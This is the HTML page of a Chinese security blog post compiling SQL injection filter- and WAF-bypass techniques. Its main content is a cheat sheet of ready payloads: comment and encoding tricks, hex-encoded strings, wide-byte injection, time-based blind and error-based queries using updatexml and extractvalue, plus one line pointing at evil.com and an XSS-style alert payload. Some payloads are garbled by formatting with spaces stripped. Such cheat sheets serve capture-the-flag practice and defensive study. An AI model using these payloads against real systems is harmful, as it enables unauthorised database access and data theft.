<!DOCTYPE html>
<html lang="en">

<!-- Head tag (contains Google-Analytics、Baidu-Tongji)-->
<head>
  <!-- Google Analytics -->
  
  <!-- Global site tag (gtag.js) - Google Analytics -->
  <script async="async" src="https://www.googletagmanager.com/gtag/js?id=UA-xxxxxx-xx"></script>
  <script type="text/javascript">
    window.dataLayer = window.dataLayer || [];

    function gtag() {
      dataLayer.push(arguments);
    }
    gtag('js', new Date());

    gtag('config', 'UA-xxxxxx-xx');
  </script>
  

  <!-- Baidu Tongji -->
  
  <script type="text/javascript">
    // Originial
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>
  

  <!-- Baidu Push -->
  
  <script>
    (function() {
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
      } else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
      }
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>
  

  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />

  <meta name="google-site-verification" content="lxDfCplOZbIzjhG34NuQBgu2gdyRlAtMB4utP5AgEBc" />
  <meta name="baidu-site-verification" content="PpzM9WxOJU" />

  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="description" content="九日，要努力变强~" />
  <meta name="keyword" content="九日,gungnir,jiuri,朱冠旭,gungnir&#39;s blog,js,web" />
  <link rel="shortcut icon" href="/img/avatar/roguerabbit.jpg" />

  <!-- Place this tag in your head or just before your close body tag. -->
  <script async="async" defer="defer" src="https://buttons.github.io/buttons.js"></script>
  <!-- Bootstrap Core CSS -->
  <link rel="stylesheet" href="/css/bootstrap.min.css" />

  <!-- Custom CSS -->
  <link rel="stylesheet" href="/css/beantech.min.css" />

  <!-- Pygments Highlight CSS -->
  
<link rel="stylesheet" href="../../../../css/highlight.css">
<link rel="stylesheet" href="../../../../css/widget.css">
<link rel="stylesheet" href="../../../../css/rocket.css">
<link rel="stylesheet" href="../../../../css/signature.css">
<link rel="stylesheet" href="../../../../css/catalog.css">
<link rel="stylesheet" href="../../../../css/livemylife.css">


  
  <!-- wave start -->
  <link rel="stylesheet" href="/css/wave.css" />
  <!-- wave end -->
  

  
  <!-- top start (article top hot config) -->
  <link rel="stylesheet" href="/css/top.css" />
  <!-- top end -->
  

  
  <!-- ThemeColor start -->
  <link rel="stylesheet" href="/css/scroll.css" />
  <!-- ThemeColor end -->
  

  
  <!-- viewer start (Picture preview) -->
  <link rel="stylesheet" href="/css/viewer.min.css" />
  <!-- viewer end -->
  

  
  <!-- Search start -->
  <link rel="stylesheet" href="/css/search.css" />
  <!-- Search end -->
  

  
  <!-- ThemeColor start -->
  <link rel="stylesheet" href="/css/themecolor.css" />
  <!-- ThemeColor end -->
  

  

  
  <!-- gitalk start -->
  <!-- <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css"> -->
  <link rel="stylesheet" href="/css/gitalk.css" />
  <!-- gitalk end -->
  

  <!-- Custom Fonts -->
  <!-- <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css" rel="stylesheet" type="text/css"> -->
  <!-- Hux change font-awesome CDN to qiniu -->
  <link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/4.5.0/css/font-awesome.min.css" type="text/css">
  <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">

  <!-- Hux Delete, sad but pending in China <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link
    href='http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/ css'> -->

  <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
  <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
  <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script> <![endif]-->

  <!-- ga & ba script hoook -->
  <link rel="canonical" href="http://yoursite-url/2021/03/07/SQL的各种绕过/">
  <title>
    
    SQL的各种绕过 - gungnir | 九日
    
  </title>
<meta name="generator" content="Hexo 4.2.1"></head>


<!-- hack iOS CSS :active style -->

<body ontouchstart="" class="body--home">
	<!-- ThemeColor -->
	
	<!-- ThemeColor -->
<!-- <div class="toggle" onclick="document.body.classList.toggle('body--dark')">Switch Color</div> -->

<div class="toggle" onclick="document.body.classList.toggle('body--dark')">
  <i class="mdui-icon material-icons bright-mode"></i>
  <i class="mdui-icon material-icons dark-mode"></i>
</div>

	

	<!-- Gitter -->
	
	<!-- Gitter -->
<!-- Docs:https://gitter.im/?utm_source=left-menu-logo -->
<script>
  ((window.gitter = {}).chat = {}).options = {
    room: 'your-community/your-room'
  };
</script>
<script src="https://sidecar.gitter.im/dist/sidecar.v1.js" async defer></script>

	

	<!-- Navigation (contains search)-->
	<!-- Navigation -->
<nav class="navbar navbar-default navbar-custom navbar-fixed-top">
  <div class="container-fluid">
    <!-- Brand and toggle get grouped for better mobile display -->
    <div class="navbar-header page-scroll">
      <button type="button" class="navbar-toggle">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="/">gungnir&#39;s blog</a>
    </div>

    <!-- Collect the nav links, forms, and other content for toggling -->
    <!-- Known Issue, found by Hux:
            <nav>'s height woule be hold on by its content.
            so, when navbar scale out, the <nav> will cover tags.
            also mask any touch event of tags, unfortunately.
        -->
    <div id="huxblog_navbar">
      <div class="navbar-collapse">
        <ul class="nav navbar-nav navbar-right">
          <li>
            <a href="/">Home</a>
          </li>

          

          
          

          
          <li>
            <a href="/about/">About</a>
          </li>
          
          

          
          <li>
            <a href="/archive/">Archives</a>
          </li>
          
          

          
          <li>
            <a href="/categories/">Categories</a>
          </li>
          
          

          
          <li>
            <a href="/tags/">Tags</a>
          </li>
          
          

          
          <li><a class="popup-trigger" title="Search"><span class="search-icon"></span>Search</a></li>
          
        </ul>
      </div>
    </div>
    <!-- /.navbar-collapse -->
  </div>
  <!-- /.container -->
</nav>
<!-- progress -->
<div id="progress">
  <div class="line" style="width: 0%;"></div>
</div>


<script>
  // Drop Bootstarp low-performance Navbar
  // Use customize navbar with high-quality material design animation
  // in high-perf jank-free CSS3 implementation
  var $body = document.body;
  var $toggle = document.querySelector('.navbar-toggle');
  var $navbar = document.querySelector('#huxblog_navbar');
  var $collapse = document.querySelector('.navbar-collapse');

  $toggle.addEventListener('click', handleMagic)

  function handleMagic(e) {
    if ($navbar.className.indexOf('in') > 0) {
      // CLOSE
      $navbar.className = " ";
      // wait until animation end.
      setTimeout(function() {
        // prevent frequently toggle
        if ($navbar.className.indexOf('in') < 0) {
          $collapse.style.height = "0px"
        }
      }, 400)
    } else {
      // OPEN
      $collapse.style.height = "auto"
      $navbar.className += " in";
    }
  }
</script>


	<!-- Post Header (contains intro-header、signature、wordcount、busuanzi、waveoverlay) -->
	<!-- Modified by Yu-Hsuan Yen -->
<!-- Post Header -->

  <!-- CDN: jsdelivr start -->
  <style type="text/css">
    header.intro-header {
       /*post*/
        background-image: url('https://cdn.jsdelivr.net/gh/urdr-gungnir/urdr-gungnir.github.io/img/header_img/lml_bg.jpg');
      
    }

    
      #signature {/*signature*/
        background-image: url('/img/signature/vincent-white.png');
      }
    
  </style>
  <!-- CDN: jsdelivr end -->





<header class="intro-header">
  <!-- Signature -->
  <div id="signature">
    <div class="container">
      <div class="row">
        <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
          
          <div class="post-heading">
            <div class="tags">
              
              <a class="tag" href="/tags/#WEB" title="WEB">WEB</a>
              
              <a class="tag" href="/tags/#SQL" title="SQL">SQL</a>
              
            </div>
            <h1>SQL的各种绕过</h1>
            <h2 class="subheading">WEB</h2>
            <span class="meta">
              Posted by gungnir on
              2021-03-07
            </span>


            
            <!-- WordCount start -->
            <div class="blank_box"></div>
            <span class="meta">
              Estimated Reading Time <span class="post-count">10</span> Minutes
            </span>
            <div class="blank_box"></div>
            <span class="meta">
              Words <span class="post-count">2.4k</span> In Total
            </span>
            <div class="blank_box"></div>
            <!-- WordCount end -->
            
            
            <!-- 不蒜子统计 start -->
            <span class="meta" id="busuanzi_container_page_pv">
              Viewed <span id="busuanzi_value_page_pv"><i class="fa fa-spinner fa-spin"></i></span> Times
            </span>
            <!-- 不蒜子统计 end -->
            


          </div>
          
        </div>
      </div>
    </div>
  </div>

  
  <!-- waveoverlay start -->
  <div class="preview-overlay">
    <svg class="preview-waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
      <defs>
        <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"></path>
      </defs>
      <g class="preview-parallax">
        <use xlink:href="#gentle-wave" x="48" y="0" fill=var(--gentle-wave1)></use>
        <use xlink:href="#gentle-wave" x="48" y="3" fill=var(--gentle-wave2)></use>
        <use xlink:href="#gentle-wave" x="48" y="5" fill=var(--gentle-wave3)></use>
        <use xlink:href="#gentle-wave" x="48" y="7" fill=var(--gentle-wave)></use>
      </g>
    </svg>
  </div>
  <!-- waveoverlay end -->
  

</header>



	<!-- Main Content (Post contains
	Pager、
	tip、
	socialshare、
	gitalk、gitment、disqus-comment、
	Catalog、
	Sidebar、
	Featured-Tags、
	Friends Blog、
	anchorjs、
	) -->
	<!-- Modify by Yu-Hsuan Yen -->
<!-- Post Content -->
<article>
  <div class="container">
    <div class="row">
      <!-- Post Container -->
      <div class="col-lg-8 col-lg-offset-1 col-md-10 col-md-offset-1 post-container">

        <h3 id="普通绕过策略"><a href="#普通绕过策略" class="headerlink" title="普通绕过策略"></a>普通绕过策略</h3><p>双写、在敏感词汇中添加注释、利用符号替代</p>
<h4 id="利用符号替代"><a href="#利用符号替代" class="headerlink" title="利用符号替代"></a>利用符号替代</h4><ol>
<li><p>and</p>
<p>^  、&amp;&amp;  </p>
</li>
<li><p>or</p>
<p>∨、||</p>
</li>
<li><p>空格</p>
<p>注释（/**/）、括号、${IFS}$、$IFS$1</p>
</li>
<li><p>=</p>
<p>like、也可以用&lt;&gt;来绕过</p>
</li>
</ol>
<p><a href="https://blog.csdn.net/devil8123665/article/details/108746947#t1" target="_blank" rel="noopener">SQL注入一些过滤及绕过总结</a></p>
<p><a href="https://blog.csdn.net/devil8123665/article/details/108746947#t2" target="_blank" rel="noopener">SQL注入绕过技巧</a></p>
<p><a href="https://blog.csdn.net/devil8123665/article/details/108746947#t3" target="_blank" rel="noopener">1.绕过空格（注释符/* */，%a0）：</a></p>
<p><a href="https://blog.csdn.net/devil8123665/article/details/108746947#t4" target="_blank" rel="noopener">2.括号绕过空格：</a></p>
<p><a href="https://blog.csdn.net/devil8123665/article/details/108746947#t5" target="_blank" rel="noopener">3.引号绕过（使用十六进制）：</a></p>
<p><a href="https://blog.csdn.net/devil8123665/article/details/108746947#t6" target="_blank" rel="noopener">4.逗号绕过（limit使用from或者offset）（substr使用from for属于逗号）：</a></p>
<p><a href="https://blog.csdn.net/devil8123665/article/details/108746947#t7" target="_blank" rel="noopener">5.比较符号（&lt;&gt;）绕过（使用greatest()）：</a></p>
<p><a href="https://blog.csdn.net/devil8123665/article/details/108746947#t8" target="_blank" rel="noopener">6.or and 绕过：</a></p>
<p><a href="https://blog.csdn.net/devil8123665/article/details/108746947#t9" target="_blank" rel="noopener">7.绕过注释符号（#，–）过滤：</a></p>
<p><a href="https://blog.csdn.net/devil8123665/article/details/108746947#t10" target="_blank" rel="noopener">8.=绕过：</a></p>
<p><a href="https://blog.csdn.net/devil8123665/article/details/108746947#t11" target="_blank" rel="noopener">9.绕过union，select，where等：</a></p>
<p><a href="https://blog.csdn.net/devil8123665/article/details/108746947#t12" target="_blank" rel="noopener">（1）使用注释符绕过：</a></p>
<p><a href="https://blog.csdn.net/devil8123665/article/details/108746947#t13" target="_blank" rel="noopener">（2）使用大小写绕过：</a></p>
<p><a href="https://blog.csdn.net/devil8123665/article/details/108746947#t14" target="_blank" rel="noopener">（3）内联注释绕过：</a></p>
<p><a href="https://blog.csdn.net/devil8123665/article/details/108746947#t15" target="_blank" rel="noopener">（4） 双关键字绕过：</a></p>
<p><a href="https://blog.csdn.net/devil8123665/article/details/108746947#t16" target="_blank" rel="noopener">10.通用绕过（编码）：</a></p>
<p><a href="https://blog.csdn.net/devil8123665/article/details/108746947#t17" target="_blank" rel="noopener">11.等价函数绕过：</a></p>
<p><a href="https://blog.csdn.net/devil8123665/article/details/108746947#t18" target="_blank" rel="noopener">12.宽字节注入：</a></p>
<p><a href="https://blog.csdn.net/devil8123665/article/details/108746947#t19" target="_blank" rel="noopener">过滤*2</a></p>
<hr>
<h1 id="SQL注入一些过滤及绕过总结"><a href="#SQL注入一些过滤及绕过总结" class="headerlink" title="SQL注入一些过滤及绕过总结"></a>SQL注入一些过滤及绕过总结</h1><p><a href="https://blog.csdn.net/weixin_44300286/article/details/96597167" target="_blank" rel="noopener">https://blog.csdn.net/weixin_44300286/article/details/96597167</a></p>
<h1 id="SQL注入绕过技巧"><a href="#SQL注入绕过技巧" class="headerlink" title="SQL注入绕过技巧"></a>SQL注入绕过技巧</h1><p><a href="https://www.cnblogs.com/Vinson404/p/7253255.html" target="_blank" rel="noopener">https://www.cnblogs.com/Vinson404/p/7253255.html</a></p>
<p>注入绕过技巧</p>
<p><a href="https://www.jianshu.com/p/48a935b123ce" target="_blank" rel="noopener">https://www.jianshu.com/p/48a935b123ce</a></p>
<h1 id="1-绕过空格（注释符-，-a0）："><a href="#1-绕过空格（注释符-，-a0）：" class="headerlink" title="1.绕过空格（注释符/* */，%a0）："></a>1.绕过空格（注释符/* */，%a0）：</h1><p>两个空格代替一个空格，用Tab代替空格，%a0=空格：</p>
<p>%20%09%0a %0b %0c %0d %a0/**/</p>
<p>最基本的绕过方法，用注释替换空格：</p>
<p>/<em>注释</em>/</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/4d3b339fd774e21dbdb1b1e436d82e44.webp" alt="img"></p>
<h1 id="2-括号绕过空格："><a href="#2-括号绕过空格：" class="headerlink" title="2.括号绕过空格："></a>2.括号绕过空格：</h1><p>如果空格被过滤，括号没有被过滤，可以用括号绕过。</p>
<p>在MySQL中，括号是用来包围子查询的。因此，任何可以计算出结果的语句，都可以用括号包围起来。而括号的两端，可以没有多余的空格。</p>
<p>例如：</p>
<p>select(user())fromdualwhere(1=1)and(2=2)</p>
<p>这种过滤方法常常用于time based盲注,例如：</p>
<p>?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23</p>
<p>（from for属于逗号绕过下面会有）</p>
<p>上面的方法既没有逗号也没有空格。猜解database（）第一个字符ascii码是否为109，若是则加载延时。</p>
<h1 id="3-引号绕过（使用十六进制）："><a href="#3-引号绕过（使用十六进制）：" class="headerlink" title="3.引号绕过（使用十六进制）："></a>3.引号绕过（<strong>使用十六进制</strong>）：</h1><p>会使用到引号的地方一般是在最后的where子句中。如下面的一条sql语句，这条语句就是一个简单的用来查选得到users表中所有字段的一条语句：</p>
<p>selectcolumn_namefrominformation_schema.tableswheretable_name=”users”</p>
<p>这个时候如果引号被过滤了，那么上面的where子句就无法使用了。那么遇到这样的问题就要使用<strong>十六进制</strong>来处理这个问题了。</p>
<p>users的十六进制的字符串是7573657273。那么最后的sql语句就变为了：</p>
<p>selectcolumn_namefrominformation_schema.tableswheretable_name=0x7573657273</p>
<h1 id="4-逗号绕过（limit使用from或者offset）（substr使用from-for属于逗号）："><a href="#4-逗号绕过（limit使用from或者offset）（substr使用from-for属于逗号）：" class="headerlink" title="4.逗号绕过（limit使用from或者offset）（substr使用from for属于逗号）："></a>4.逗号绕过（limit<strong>使用from或者offset</strong>）（substr使用from for属于逗号）：</h1><p>在使用盲注的时候，需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决：</p>
<p>select substr(database(0from1for1);select mid(database(0from1for1);</p>
<p>对于limit可以使用offset来绕过：</p>
<p>select<em>fromnews limit0,1# 等价于下面这条SQL语句select</em>fromnews limit1offset0</p>
<h1 id="5-比较符号（-lt-gt-）绕过（使用greatest-）："><a href="#5-比较符号（-lt-gt-）绕过（使用greatest-）：" class="headerlink" title="5.比较符号（&lt;&gt;）绕过（使用greatest()）："></a>5.比较符号（&lt;&gt;）绕过（<strong>使用greatest()</strong>）：</h1><p>同样是在使用盲注的时候，在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符，那么就需要使用到greatest来进行绕过了。</p>
<p>最常见的一个盲注的sql语句：</p>
<p>select * from users where id=1 and ascii(substr(database(),0,1))&gt;64</p>
<p>此时如果比较操作符被过滤，上面的盲注语句则无法使用,那么就可以使用greatest来代替比较操作符了。greatest(n1,n2,n3,…)函数返回输入参数(n1,n2,n3,…)的最大值。</p>
<p>那么上面的这条sql语句可以使用greatest变为如下的子句:</p>
<p>select*fromuserswhereid=1and greatest(ascii(substr(database(),0,1)),64)=64</p>
<h1 id="6-or-and-绕过："><a href="#6-or-and-绕过：" class="headerlink" title="6.or and 绕过："></a>6.or and 绕过：</h1><p>and=&amp;&amp; or=||</p>
<h1 id="7-绕过注释符号（-，–）过滤："><a href="#7-绕过注释符号（-，–）过滤：" class="headerlink" title="7.绕过注释符号（#，–）过滤："></a>7.绕过注释符号（#，–）过滤：</h1><p>id=1’union select 1,2,3||’1</p>
<p>最后的or ‘1闭合查询语句的最后的单引号，或者：</p>
<p>id=1’union select 1,2,’3</p>
<h1 id="8-绕过："><a href="#8-绕过：" class="headerlink" title="8.=绕过："></a>8.=绕过：</h1><p>使用like 或者 使用&lt; 或者 &gt;</p>
<h1 id="9-绕过union，select，where等："><a href="#9-绕过union，select，where等：" class="headerlink" title="9.绕过union，select，where等："></a>9.绕过union，select，where等：</h1><h2 id="（1）使用注释符绕过："><a href="#（1）使用注释符绕过：" class="headerlink" title="（1）使用注释符绕过："></a>（1）使用注释符绕过：</h2><p>常用注释符：</p>
<p>//，– , /**/, #, –+, – -, ;,%00,–a</p>
<p>用法：</p>
<p>U/<strong>/NION/</strong>/SE/<strong>/LECT/</strong>/user，pwd from user</p>
<h2 id="（2）使用大小写绕过："><a href="#（2）使用大小写绕过：" class="headerlink" title="（2）使用大小写绕过："></a>（2）使用大小写绕过：</h2><p>id=-1’UnIoN/**/SeLeCT</p>
<h2 id="（3）内联注释绕过："><a href="#（3）内联注释绕过：" class="headerlink" title="（3）内联注释绕过："></a>（3）内联注释绕过：</h2><p>id=-1’/<em>!UnIoN</em>/SeLeCT1,2,concat(/<em>!table_name</em>/) FrOM/<em>information_schema</em>/.tables/<em>!WHERE</em>//<em>!TaBlE_ScHeMa</em>/like database()#</p>
<h2 id="（4）-双关键字绕过："><a href="#（4）-双关键字绕过：" class="headerlink" title="（4） 双关键字绕过："></a>（4） 双关键字绕过：</h2><p>id=-1’UNIunionONSeLselectECT1,2,3–-</p>
<h1 id="10-通用绕过（编码）："><a href="#10-通用绕过（编码）：" class="headerlink" title="10.通用绕过（编码）："></a>10.通用绕过（编码）：</h1><p>如URLEncode编码，ASCII,HEX,unicode编码绕过：</p>
<p>or1=1即%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。</p>
<h1 id="11-等价函数绕过："><a href="#11-等价函数绕过：" class="headerlink" title="11.等价函数绕过："></a>11.等价函数绕过：</h1><p>hex()、bin()==&gt;ascii()</p>
<p>sleep()==&gt;benchmark()</p>
<p>concat_ws()==&gt;group_concat()</p>
<p>mid()、substr()==&gt;substring() @@user==&gt;user() @@datadir==&gt;datadir()</p>
<p>举例：substring()和substr()无法使用时：?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74或者：</p>
<p>substr((select’password’),1,1)=0x70strcmp(left(‘password’,1),0x69)=1strcmp(left(‘password’,1),0x70)=0strcmp(left(‘password’,1),0x71)=-1</p>
<h1 id="12-宽字节注入："><a href="#12-宽字节注入：" class="headerlink" title="12.宽字节注入："></a>12.宽字节注入：</h1><p>过滤 ‘ 的时候往往利用的思路是将 ‘ 转换为 &#39; 。</p>
<p>在 mysql 中使用 GBK 编码的时候，会认为两个字符为一个汉字，一般有两种思路：</p>
<p>（1）%df 吃掉 \ 具体的方法是 urlencode(‘) = %5c%27，我们在 %5c%27 前面添加 %df ，形成 %df%5c%27 ，而 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字，%df%5c 就是一个汉字，%27 作为一个单独的（’）符号在外面：</p>
<p>id=-1%df%27union select 1,user(),3–+</p>
<p>（2）将 &#39; 中的 \ 过滤掉，例如可以构造 %**%5c%5c%27 ，后面的 %5c 会被前面的 %5c 注释掉。</p>
<p>一般产生宽字节注入的PHP函数：</p>
<p>1.replace（）：过滤 ‘ \ ，将 ‘ 转化为 &#39; ，将 \  转为 \，将 “ 转为 &quot; 。用思路一。</p>
<p>2.addslaches()：返回在预定义字符之前添加反斜杠（\）的字符串。预定义字符：’ , “ , \ 。用思路一</p>
<p>（防御此漏洞，要将 mysql_query 设置为 binary 的方式）</p>
<p>3.mysql_real_escape_string()：转义下列字符：</p>
<p>\x00  \n  \r  &#39;“  \x1a</p>
<p>（防御，将mysql设置为gbk即可）</p>
<h1 id="过滤-2"><a href="#过滤-2" class="headerlink" title="过滤*2"></a>过滤*2</h1><p>0x00 sql注入的原因</p>
<p>sql注入的原因，表面上说是因为 拼接字符串，构成sql语句，没有使用 sql语句预编译，绑定变量。</p>
<p>但是更深层次的原因是，将用户输入的字符串，当成了 “sql语句” 来执行。</p>
<p>比如上面的 String sql = “select id,no from user where id=” + id;</p>
<p>我们希望用户输入的 id 的值，仅仅作为一个字符串字面值，传入数据库执行，但是当输入了： 2 or 1=1 时，其中的 or 1=1 并没有作为 where id= 的字面值，而是作为了 sql语句 来执行的。所以其本质是将用户的输入的数据，作为了命令来执行。</p>
<p>0x01 sql注入绕过</p>
<p>1.1 注释符绕过</p>
<p>常用注释符：</p>
<p>//,– , /<strong>/, #, –+, – -, ;,%00,–aUNION/</strong>/Select/<strong>/user，pwd，fromuserU/</strong>/NION/<strong>/SE/</strong>/LECT/**/user，pwdfromuser</p>
<p>1.2 大小写绕过</p>
<p>?id=1+UnIoN/**/SeLeCT</p>
<p>1.3 内联注释绕过</p>
<p>id=1/<em>!UnIoN</em>/+SeLeCT+1,2,concat(/<em>!table_name</em>/)+FrOM/<em>information_schema</em>/.tables/<em>!WHERE */+/</em>!TaBlE_ScHeMa*/+like+database()– -</p>
<p>通常情况下，上面的代码可以绕过过滤器，请注意，我们用的是 Like而不是 =</p>
<p>1.4 双关键字绕过</p>
<p>?id=1+UNIunionON+SeLselectECT+1,2,3–</p>
<p>1.5 编码绕过</p>
<p>如URLEncode编码，ASCII,HEX,unicode编码绕过</p>
<p>or1=1即%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。十六进制编码SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))双重编码绕过?id=1%252f%252a<em>/UNION%252f%252a /SELECT%252f%252a</em>/1,2,password%252f%252a<em>/FROM%252f%252a</em>/Users–+一些unicode编码举例： 单引号：’%u0027 %u02b9%u02bc</p>
<p>%u02c8%u2032</p>
<p>%uff07%c0%27%c0%a7%e0%80%a7</p>
<p>空白：</p>
<p>%u0020%uff00</p>
<p>%c0%20%c0%a0%e0%80%a0</p>
<p>左括号(:</p>
<p>%u0028%uff08</p>
<p>%c0%28%c0%a8%e0%80%a8</p>
<p>右括号):</p>
<p>%u0029%uff09</p>
<p>%c0%29%c0%a9%e0%80%a9</p>
<p>1.6 空格绕过</p>
<p>两个空格代替一个空格，用Tab代替空格%20 %09 %0a %0b %0c %0d %a0 /**/</p>
<p>括号绕过空格</p>
<p>在MySQL中，括号是用来包围子查询的。因此，任何可以计算出结果的语句，都可以用括号包围起来</p>
<p>select(user())from dual where 1=1 and 2=2;</p>
<p>1.7 万能密钥绕过</p>
<p>用经典的or1=1判断绕过,如or‘swords’ =’swords</p>
<p>1.8 +,-,.号拆解字符串绕过</p>
<p>?id=1’ or’11+11’=’11+11’”-“和”.”</p>
<p>1.9 like绕过</p>
<p>?id=1’ or 1 like 1绕过对“=”，“&gt;”等的过滤</p>
<p>2.0 in绕过</p>
<p>or’1’IN(‘swords’)</p>
<p>2.1 &gt;,&lt;绕过</p>
<p>or’password’&gt;’pass’or1&lt;3</p>
<p>2.2 等价函数与命令绕过</p>
<p>1.函数或变量</p>
<p>hex()、bin()==&gt;ascii()sleep()==&gt;benchmark()concat_ws()==&gt;group_concat()mid()、substr()==&gt;substring()@@user==&gt;user()@@datadir==&gt;datadir()举例：substring()和substr()无法使用时：?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74　或者：substr((select ‘password’),1,1) = 0x70strcmp(left(‘password’,1),0x69)= 1strcmp(left(‘password’,1),0x70)= 0strcmp(left(‘password’,1),0x71)= -1</p>
<p>2.符号</p>
<p>and和or有可能不能使用，可以试下&amp;&amp;和||=不能使用的情况，可以考虑尝试&lt;、&gt;</p>
<p>3.生僻函数</p>
<p>MySQL/PostgreSQL支持XML函数：SelectUpdateXML(‘ ’,’/script/@x/’,’src=//evil.com’);　　　　　　　　　　?id=1 and 1=(updatexml(1,concat(0x3a,(selectuser())),1))SELECTxmlelement(nameimg,xmlattributes(1assrc,’a\l\x65rt(1)’as\117n\x65rror));　//postgresql?id=1 and extractvalue(1, concat(0x5c, (selecttable_namefrominformation_schema.tableslimit1)));and 1=(updatexml(1,concat(0x5c,(selectuser()),0x5c),1))andextractvalue(1,concat(0x5c, (selectuser()),0x5c))</p>
<p>2.3 反引号`绕过</p>
<p>select<code>version()</code>，可以用来过空格和正则，特殊情况下还可以将其做注释符用</p>
<p>2.4 换行符绕过</p>
<p>%0a、%0d</p>
<p>2.5 截断绕过</p>
<p>%00,%0A,?,/0,……..,%80-%99</p>
<p>目录字符串，在window下256字节、linux下4096字节时会达到最大值，最大值长度之后的字符将被丢弃。</p>
<p>././././././././././././././././abc</p>
<p>abc</p>
<p>..1/abc/../1/abc/../1/abc</p>
<p>2.6 宽字节绕过</p>
<p>过滤单引号时，可以试试宽字节</p>
<p>%bf%27 %df%27 %aa%27</p>
<p>2.7 \N绕过</p>
<p>\N其实相当于NULL字符</p>
<p>select<em>fromuserswhereid=8E0unionselect1,2,3,4,5,6,7,8,9,0select</em>fromuserswhereid=8.0unionselect1,2,3,4,5,6,7,8,9,0select*fromuserswhereid=\Nunionselect1,2,3,4,5,6,7,8,9,0</p>


        <hr>
        <!-- Pager -->
        <ul class="pager">
          
          
          <li class="next">
            <a href="/2021/03/06/SUCTF-2019-Pythonginx/" data-toggle="tooltip" data-placement="top" title="[SUCTF 2019]Pythonginx">Next Post &rarr;</a>
          </li>
          
        </ul>

        
        <!-- tip start -->
        <div class="tip">
          <p>
            If you like this blog or find it useful for you, you are welcome to comment on it. You are also welcome to share this blog, so that more people can participate in it. If the images used in the blog infringe your copyright, please contact the author to delete them. Thank you !
          </p>
        </div>
        <!-- tip end -->
        

        
        <!-- Sharing Srtart -->
        <!-- Social Social Share Post -->
<!-- Docs:https://github.com/overtrue/share.js -->

<div class="social-share" data-initialized="true" data-disabled="tencent ,douban ,qzone ,linkedin ,facebook ,google ,diandian" data-wechat-qrcode-helper="" align="center">
  <ul class="list-inline text-center social-share-ul">
    <li class="social-share-li">
      <a target="_blank" class="social-share-icon icon-twitter">
        <i class="fa fa-twitter fa-1x" aria-hidden="true"></i>
      </a>
    </li>
    <li class="social-share-li">
      <a class="social-share-icon icon-wechat">
        <i class="fa fa-weixin fa-1x" aria-hidden="true"></i>
      </a>
    </li>
    <li class="social-share-li">
      <a target="_blank" class="social-share-icon icon-weibo">
        <i class="fa fa-weibo fa-1x" aria-hidden="true"></i>
      </a>
    </li>
    <li class="social-share-li">
      <a target="_blank" class="social-share-icon icon-qq">
        <i class="fa fa-qq fa-1x" aria-hidden="true"></i>
      </a>
    </li>
    <li class="social-share-li">
      <a target="_blank" class="social-share-icon" href="mailto:?subject=SQL的各种绕过&body=Hi,I found this website and thought you might like it http://yoursite-url/2021/03/07/SQL的各种绕过/">
        <i class="fa fa-envelope fa-1x" aria-hidden="true"></i>
      </a>
    </li>
  </ul>
</div>

<!-- css & js -->
<!-- <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css"> -->
<script defer="defer" async="true" src="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>

        <!-- Sharing End -->
        
        <hr>

        <!-- comments start -->
        <!-- 1. gitalk comment -->

<!-- gitalk start -->
<!-- Docs:https://github.com/gitalk/gitalk/blob/master/readme-cn.md -->

<div id="gitalk-container"></div>

<!-- <script src="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.js"></script> -->
<script src="/js/comment/gitalk.js"></script>

<script>
  var gitalk = new Gitalk({
    clientID: '',
    clientSecret: '',
    repo: '',
    owner: '',
    admin: '',
